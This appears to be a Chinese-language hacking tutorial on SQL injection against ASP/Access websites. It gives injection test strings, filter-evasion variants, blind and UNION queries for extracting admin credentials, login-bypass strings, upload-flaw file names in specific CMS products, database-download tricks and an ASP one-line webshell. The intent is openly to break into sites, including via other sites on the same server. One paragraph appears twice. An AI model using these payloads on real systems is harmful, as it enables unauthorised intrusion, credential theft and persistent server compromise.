SQL注入

本文由zoujialan貢獻
1、注入點的判斷及猜解
1.加入單引號 ’提交,
結果:若是出現錯誤提示，則該網站可能就存在注入漏洞。
2.數字型判斷是否有注入;
語句：and 1=1 ;and 1=2 （經典）、' and '1'=1(字符型）
結果:分別返回不一樣的頁面,說明存在注入漏洞.
分析：and 的意思是「和」若是沒有過濾咱們的語句，and 1=1就會被代入SQL查詢語句進行查詢，
若是and先後的兩條語句都是真的話就不會出錯，但若是先後語句有一個爲假的話，程序就會暴錯。
也就代表程序有注入漏洞
防注入解決辦法：
1>使用or 2>1 ; or 1>2來進行判斷
  結果:分別返回不一樣的頁面,說明存在注入漏洞.
  分析：or注入只要求先後兩個語句只要有一個正確就爲真，若是先後兩個語句都是正確的，反而爲
假。
   記住：or注入時，or後面的語句若是是正確的，則返回錯誤頁面！若是是錯誤，則返回正確頁面
，說明存在注入點。
2> 使用xor 1=1; xor 1=2
   結果:分別返回不一樣的頁面,說明存在注入漏洞.
   分析:xor 表明着異或,意思即鏈接的表達式僅有一個爲真的時候才爲真。
   記住：xor注入時，xor後面的語句若是是正確的，則返回錯誤頁面積，若是是錯誤，則返回正確
頁面，說明存在注入點。
3>把and 1=1轉換成URL編碼形式後在提交
  and 1=1 URL編碼：%41%4E%44%20%%31%3D%31
4>使用-1；-0
  分析：若是返回的頁面和前面不一樣，是另外一則新聞，則表示有注入漏洞，是數字型的注入漏洞;在 
URL地址後面加上 -0，URL變成 news.asp?id=123-0，返回的頁面和前面的
頁面相同，加上-1，返回錯誤頁面，則也表示存在注入漏洞.
3.字符型判斷是否有注入：
  語句：' and '1'=1；' and  '1=2(經典）
  結果：結果:分別返回不一樣的頁面,說明存在注入漏洞.
  分析：加入' and '1'=1返回正確頁面，加入' and  '1=2返回錯誤頁面，說明有注入漏同。
  防注入解決辦法：
  1>在URL的地址後面加上'%2B'（字符型）
  分析：URL地址變爲：news.asp?id=123'%2B'，返回的頁面和1同;加
上'2%2B'asdf，URL地址變爲：news.asp?id=123'%2Basdf，返回的頁面和1
不一樣，或者說未發現該條記錄，或者錯誤，則表示存在注入點，是文本型的。
4.搜索型判斷是否有注入:
簡單的判斷搜索型注入漏洞存在不存在的辦法是先搜索'，若是出錯，說明90%存在這個漏洞。而後搜
索%，若是正常返回，說明95%有洞了。
說明：加入如"&;"、"["、"]"、"%"、"$"、"@"等特殊字符，均可以實現，若是出現錯誤，說明有問題
操做：
搜索一個關鍵字，好比2006吧，正常返回全部2006相關的信息，再搜索2006%'and 1=1 and '%'='和
2006%'and 1=2 and '%'='，存在異同的話，就是100%有洞了。
關鍵字%' and 1=1 and '%'='%
關鍵字%' and 1=2 and '%'='%
將and 1=1 換成注入語句就能夠了
5.判斷數據庫類型：and user>0  例如：showdetail.asp?id=49 ;and user>0 
若是是ACCESS數據庫,那麼返回的錯誤裏通常會有"Microsoft JET Database"關鍵定，若是是MSSQL數
據庫的話返回的錯誤提示裏通常會含有"SQL Server"關鍵了.
6.猜表名 and exists (select * from 表名)
  說明：意思與上面同樣，只是用的語名不同。
7.猜列名 and (select count(列名) from 表名)>0
  說明：若是咱們輸入的列名猜解正確否反回正常頁面
8.猜長度 and (select top 1 len(username) from admin)>0
  說明：若是咱們輸入的最後一位數據返回錯誤，而錯誤前一位數字返回正確，說明我所猜解的長度
爲正確。
9.猜內容 and (select top 1 asc(mid(username,1,1)) from admin)>50 ascii碼1-128
  說明：若是咱們輸入的最後一位數據返回錯誤，而錯誤前一位數字返回正確，說明我所猜解的數字
正確。（可使用折半法猜內容）
折半法：最小值與最大值差的一半，好比輸入50返正確，輸入100返回錯誤，折半後輸入75。
10.聯合查詢注入(union查詢）
操做步驟：
1>在正常語句後臺加入 and 1=2 union select * form 表名，其中*號表明字段數量，從1一直追加
（and 1=2 union select 1，2，3，4 form 表名）若是字段數正確就會有暴錯。
2>在頁面顯示數字的地方用真實獲得的字段名代替，如：username,password.
3>在頁面字段值處暴出真實的數據庫字段值。
2、查找後臺地址,找到後臺用獲得的用戶管理員的賬戶與密碼進行登錄.
3、上傳WEBSHELL
方法主要有：
1.上傳漏洞: 若是看到:選擇你要上傳的文件 [從新上傳]或者出現「請登錄後使用」，80%就有漏洞
了！ 有時上傳不必定會成功,這是由於Cookies不同.咱們就要用WSockExpert取得Cookies.再用 
DOMAIN上傳或是桂林老兵上傳工具.
1>上傳漏洞的文件
  動網是upfile.asp。
  動易是在upfile_soft.asp,（軟件上傳漏洞）upfile_softpic.asp（圖片上傳漏洞）
  動感是在uploadflash.asp,upfile_flash.asp，利用抓包工具抓包獲得cookies，再用   DOMAIN上
傳或是桂林老兵上傳工具
2>添加上傳類型
  asa|asaspp
3>就是在上傳時在後綴後面加空格或者加幾點，也許也會有驚奇的發現。例：*.asp ,*.asp..。
4>上傳圖片文件木馬，使用備份數據庫獲得asp文件
2.cookies欺騙
  使用cookies能夠達到讓網站認識你的目的。可是若是cookies驗證不足就會造成cookies欺騙。用  
到工具 桂林老兵cookies欺騙工具。
3.%5c暴庫
  把二級目錄中間的/換成%5c EY:otherweb ... s.asp?BigClassName=職
責範圍&;BigClassType=1 若是你能看到：’E:\ahttc040901
\otherweb\dz\database\iXuEr_Studio.asa’不是一個有效的 路徑。 肯定路徑名稱拼寫是否正確，
以及是否 鏈接到文件存放的服務器。 這樣的就是數據庫了。下載時用FLASHGET換成.MDB格式的就行
. 
4.conn.asp暴庫
  這個也是比較老的漏洞，利用價值不大
5.'or'='or'萬能密碼登錄
  ’or’=’or’這是一個能夠鏈接SQL的語名句.能夠直接進入後臺。我收集了一下。相似的還有 ： 
  ’or’’=’ " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- ’ or ’ a’=’a  
  一個很老的利用方法，主要用於一些比較老的網站。
6.旁註,也就是跨站. 咱們入侵某站時可能這個站堅固的無懈可擊，咱們能夠找下和這個站同一服務
器的站點，而後在利 用這個站點用提權，嗅探等方法來入侵咱們 要入侵的站點。，在這裏有個難點
，就是一些服務器 的絕對路徑通過加密，這就看咱們的本事了 
7.寫入ASP格式數據庫。就是一句話木馬[〈%execute request("value")%〉 ]，經常使用在留言本. 如：
這個就是ASP格式的數據庫或者能夠寫入內容的
ASP文件,如南方數據的系統配置]，再寫 入一句話木馬.
8.旁註,也就是跨站. 咱們入侵某站時可能這個站堅固的無懈可擊，咱們能夠找下和這個站同一服務
器的站點，而後在利 用這個站點用提權，嗅探等方法來入侵咱們 要入侵的站點。，在這裏有個難點
，就是一些服務器 的絕對路徑通過加密，這就看咱們的本事了
4、整站利用
    動網BBS 能夠先用:dvbbs權限提高工具，使自已成爲前 
   臺管理員。 THEN，運用:動網固頂貼工具，找個固頂貼，再取得COOKIES，這個要你自已作。我   
們能夠用 WSockExpert取得Cookies/NC包 這個我就不作了，網上教程多的是，自已下個看看。     
工具：dvbbs權限提高工具 動網固頂貼工具
總結：
我的認爲ACCESS網站注比不是很靈活，方法你們都知道，針對國內的網站來講你們能夠到網站搜索
網站是利用什麼程序改過來的，如今通常都是利用已經存在的企業網站系統來進行修改。

下一篇整理MSSQL注入方法,MSSQL注入十分的靈活,功能也特別強大.只要找到注入點,通常
狀況下是能夠拿下來的,